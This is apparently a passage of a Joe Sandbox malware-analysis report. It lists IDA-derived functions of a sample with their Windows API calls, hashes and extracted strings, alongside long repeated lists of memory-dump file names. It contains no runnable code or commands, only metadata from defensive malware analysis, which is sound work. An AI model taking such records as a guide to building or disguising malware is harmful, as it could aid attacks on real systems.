Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 07d527e77767b7176b1aec66b26bb399f8f6579552e2aa3c6a11aba2d0a093f9
Instruction ID: 802e52ea912869eedb338f02cf3bfde60e399541db56db379a8446bdb16c658b
Opcode Fuzzy Hash: 07d527e77767b7176b1aec66b26bb399f8f6579552e2aa3c6a11aba2d0a093f9
Instruction Fuzzy Hash: 14F070B4119701CFD355DF24D5A471A7BF4FB89714F10884CE49A9B390CB759A48DF82

Function 009628EB Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0096292F

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 4bc02ed972c826e2790ed2b28e4f28a8888b2668f09a5bcfee02a72ec9083f4b
Instruction ID: 544f1c467aaee6ca77c90c3e7223cea1f43c7a18bef6f443863c6b0d007718ca
Opcode Fuzzy Hash: 4bc02ed972c826e2790ed2b28e4f28a8888b2668f09a5bcfee02a72ec9083f4b
Instruction Fuzzy Hash: 9BF07A7551C3418FD314DF24C5A871BBBE0BB84308F00891DE5998B390C7B59549DF82

Function 00939EB7 Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202,?), ref: 00939ED2

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: fad6cdfacab0111e7a77867a6321f8e5fbfd61b3a071e0c4e19943a086d76f6e
Instruction ID: 163c295bb9ba7af824ba21e785c2663df13ee95f0da721d03cba949e37c14db4
Opcode Fuzzy Hash: fad6cdfacab0111e7a77867a6321f8e5fbfd61b3a071e0c4e19943a086d76f6e
Instruction Fuzzy Hash: 8DE02B33654602DBE700DF30FC57E4D3356DB553817068428E11DC1072EAB39460EA10

Function 0096C570 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0093B0ED,?), ref: 0096C590

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 7624a944da0e581fec6ebee93d01d72132edec1faf3f041ad309f1ec1f2095ce
Instruction ID: 1efd9151c873f9c9ec0ea4465b3a68430161db1297062d640d6c327819b44f48
Opcode Fuzzy Hash: 7624a944da0e581fec6ebee93d01d72132edec1faf3f041ad309f1ec1f2095ce
Instruction Fuzzy Hash: 85D0C932429122EBCA102F28BC15BC73A64EF49320F070891B4046A174D624EC91DAD0

Function 0096C55C Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0096C561

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2945c76b496220412862474b67f9f18d9dc7500f855c500e472871a92ef47906
Instruction ID: 0fd5ae015a987704ab8b4a24b164957efea2daf7519e9ca17da96528b0185ac1
Opcode Fuzzy Hash: 2945c76b496220412862474b67f9f18d9dc7500f855c500e472871a92ef47906
Instruction Fuzzy Hash: 43A00271198110DFDA562F24FC09FC47B21EB58721F134192F5015A1F6D771DC92EB84

Non-executed Functions

Function 009542D0 Relevance: 39.6, APIs: 2, Strings: 20, Instructions: 1129COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 009543AA
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0095443E

Strings

%r?p, xrefs: 0095595F
<j:h, xrefs: 00955975
gd, xrefs: 00955E60
|r, xrefs: 009553A8
N~4|, xrefs: 0095593E
r:i8, xrefs: 00955899
+$e, xrefs: 009543FA, 0095442B
uw, xrefs: 00955B57
Xs, xrefs: 00955CD8
ut, xrefs: 00955CE3
=:, xrefs: 009557CE
=?, xrefs: 00955BF1
tj, xrefs: 009553BE
y{, xrefs: 00955B36
+$e, xrefs: 00954365, 0095437A
b`, xrefs: 009555F9
13, xrefs: 00955BFC
e>n<, xrefs: 0095588E
n l, xrefs: 0095596A
DD, xrefs: 00955CEE

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630136774.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630193199.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630230710.0000000000BEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630317579.0000000000C06000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630381100.0000000000C07000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630414096.0000000000C17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630447968.0000000000C18000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C19000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630507666.0000000000C20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630590640.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630650067.0000000000C2E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_TTsfmr1RWm.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$Xs$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
API String ID: 237503144-1429676654
Opcode ID: 50cb7b61aeedfc4be50968ef796baf74194cfccfcd97f45c27473ce4067129ce
Instruction ID: 3393b6a6d710e260dd8a2e6394e6e287f86183aa1236ed7ecbc708d1133ca67f
Opcode Fuzzy Hash: 50cb7b61aeedfc4be50968ef796baf74194cfccfcd97f45c27473ce4067129ce
Instruction Fuzzy Hash: 8BC20CB560C3848AD334CF54C452B9FBBF2FB82304F00892DD5E96B255D7B1864A8B9B

Function 00954560 Relevance: 36.1, APIs: 1, Strings: 19, Instructions: 1081COMMON

Download Yara Rule

Strings

%r?p, xrefs: 0095595F
<j:h, xrefs: 00955975
gd, xrefs: 00955E60
|r, xrefs: 009553A8
N~4|, xrefs: 0095593E
r:i8, xrefs: 00955899
+$e, xrefs: 0095442B
uw, xrefs: 00955B57
Xs, xrefs: 00955CD8
ut, xrefs: 00955CE3
=:, xrefs: 009557CE
=?, xrefs: 00955BF1
tj, xrefs: 009553BE
y{, xrefs: 00955B36
b`, xrefs: 009555F9
13, xrefs: 00955BFC
e>n<, xrefs: 0095588E
n l, xrefs: 0095596A
DD, xrefs: 00955CEE

Memory Dump Source

Source File: 00000000.00000002.2628929861.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.2628893119.0000000000930000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2628929861.0000000000975000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629019517.0000000000985000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629057411.0000000000992000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629260949.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629298408.0000000000AEC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629330347.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629362076.0000000000B00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B03000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629415826.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629493461.0000000000B20000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629521295.0000000000B23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629601836.0000000000B24000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629628243.0000000000B26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629669831.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629710841.0000000000B50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629749785.0000000000B66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629777083.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629809282.0000000000B6E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629838550.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629874474.0000000000B7A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629906203.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629940042.0000000000B8A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629971792.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2629998188.0000000000B96000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630074133.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2630106646.0000000000B9E000.00000080.00000001.01000000.00000003.sdmpDownload File
